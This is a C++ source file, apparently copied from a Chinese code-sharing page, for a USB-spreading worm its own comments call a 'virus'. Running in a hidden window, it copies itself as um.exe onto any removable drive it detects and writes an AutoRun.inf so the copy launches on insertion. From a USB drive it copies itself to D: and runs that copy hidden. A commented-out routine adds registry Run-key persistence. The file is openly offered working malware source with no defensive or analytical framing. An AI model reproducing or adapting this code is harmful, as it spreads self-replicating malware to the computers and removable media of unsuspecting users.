?? um.cpp
字號:
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#define TIMER 1//計時器
#define WM_FROMC WM_USER+0//自定義消息 從C盤中啟動
#define WM_FROMU WM_USER+1//自定義消息 從U盤中啟動
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口過程
//病毒從U盤啟動時用到的函數
BOOL FileExist(TCHAR *path);//測試一個文件是否存在
BOOL GetSelfPath(TCHAR *path);//Get the virus"s path
BOOL FindU(TCHAR *u);//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path);//得到系統路徑
BOOL CopyToSysAndSet(HWND hwnd);//復制自身到系統目錄和設置
BOOL SetFileAttrib(TCHAR *path);//設置path所指文件的屬性
//BOOL RegAutoRun(TCHAR *path);//修改注冊表,實現自啟動
//從C盤啟動時用到函數
BOOL CopyToUAndSet();//復制自己到U盤
BOOL CreateAutoRunFile(TCHAR *path);//在U盤下生成autorun.inf文件
BOOL FindSelf();//測試自己是否在已經執行了
//global variable
TCHAR szExePath[MAX_PATH];//the virus"s path
TCHAR U[2];//保存U盤的盤符
TCHAR szSysPath[MAX_PATH];//system path
//constant
const TCHAR *szExeName="um.exe";
const TCHAR *szAutoRunFile="AutoRun.inf";
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR
szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ("virus");
HWND hwnd;
MSG msg;
WNDCLASS wndclass;
wndclass.style=0;
wndclass.lpfnWndProc=WndProc;
wndclass.cbClsExtra=0;
wndclass.cbWndExtra=0;
wndclass.hInstance=hInstance;
wndclass.hIcon=0;
wndclass.hCursor=0;
wndclass.hbrBackground=0;
wndclass.lpszMenuName=NULL;
wndclass.lpszClassName=szAppName;
if (!RegisterClass (&wndclass))
{
MessageBox (NULL,TEXT("Program requires Windows NT!"),szAppName,MB_ICONERROR);
return 0;
}
hwnd = CreateWindow (szAppName, NULL,WS_DISABLED,0,0,0,0,NULL, NULL,hInstance, NULL);
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage (&msg);
DispatchMessage (&msg);
}
return msg.wParam;
}
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM
lParam)
{
switch(message)
{
// 處理一些要下面要用到的全局變量
case WM_CREATE:
GetSysPath(szSysPath);//得到系統路徑
SetTimer(hwnd,TIMER,5000,NULL);//啟動計時器
GetSelfPath(szExePath);//得到自身的路徑
return 0;
//timer message
case WM_TIMER:
if(szExePath[0]=='D')
{
if(FindU(U))
{
SendMessage(hwnd,WM_FROMC,0,0);
}
}
else
SendMessage(hwnd,WM_FROMU,0,0);
return 0;
case WM_FROMC:
CopyToUAndSet();
return 0;
case WM_FROMU:
CopyToSysAndSet(hwnd);
return 0;
case WM_DESTROY:
KillTimer(hwnd,TIMER);
PostQuitMessage(0);
return 0;
}
return ::DefWindowProc(hwnd, message, wParam, lParam);
}
BOOL GetSelfPath(TCHAR *path)
{
if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目錄
{
return TRUE;
}
else
return FALSE;
}
BOOL FindU(TCHAR *u)
{
u[1]=':';
for(char d='C';d<='Z';d++)//遍歷C到Z
{
u[0]=d;
if(GetDriveType(u)==DRIVE_REMOVABLE)//判斷是不是可移動的盤
return TRUE;
}
return FALSE;
}
BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH);//得到系統路徑
}
BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,"d:");
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//得到復制到系統目錄的完整目錄
if(!FileExist(szPath))//檢測是否已經存在復制的文件
{
CopyFile(szExePath,szPath,FALSE);
//RegAutoRun(szPath);
return SetFileAttrib(szPath);
}
else
{
if(!FindSelf())//檢測自己有沒有運行
WinExec(szPath,SW_HIDE);//沒有就執行
//WinExec(szPath,SW_HIDE);
//SendMessage(hwnd,WM_CLOSE,0,0);//結束自己
}
return FALSE;
}
BOOL FileExist(TCHAR *path)//檢測PATH所指的路徑的文件是否存在
{
int result;
result=PathFileExists(path);
if(result==1)
return TRUE;
else
return FALSE;
}
BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_NORMAL);
}
/*BOOL RegAutoRun(TCHAR *path)//修改注冊表
{
HKEY hkey;
if(RegOpenKey
(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
&hkey)==ERROR_SUCCESS)
{
RegSetvalueEx(hkey,szExeName,0,REG_SZ,(BYTE*)path,lstrlen(path));
RegCloseKey(hkey);
return TRUE;
}
else
return FALSE;
}*/
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,U);
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//得到指向U盤的完整目錄
TCHAR szAutoFile[MAX_PATH];
lstrcpy(szAutoFile,U);
lstrcat(szAutoFile,"\\");
lstrcat(szAutoFile,szAutoRunFile);
//if(!FileExist(szAutoFile))
//{
CreateAutoRunFile(szAutoFile);
SetFileAttrib(szAutoFile);
//}
if(!FileExist(szPath))
{
CopyFile(szExePath,szPath,FALSE);
return SetFileAttrib(szPath);
}
return FALSE;
}
BOOL CreateAutoRunFile(TCHAR *path) //在U盤下創建一個autorun.inf文件
{
ofstream fout;
fout.open(path);
if(fout)
{
fout<<"[AutoRun]"<<endl;
fout<<"open=um.exe e"<<endl;
fout<<"shellexecute=um.exe e"<<endl;
fout<<"shell\\Auto\\command=um.exe e"<<endl;
//fout<<"shell=Auto"<<endl;
fout.close();
return TRUE;
}
return FALSE;
}
BOOL FindSelf(){
PROCESSENTRY32 pe;
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hShot,&pe)){
do{
if(lstrcmp(pe.szExeFile,szExeName)==0)
{
CloseHandle(hShot);
return TRUE;
}
}while(Process32Next(hShot,&pe));
}
CloseHandle(hShot);
return FALSE;
}?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -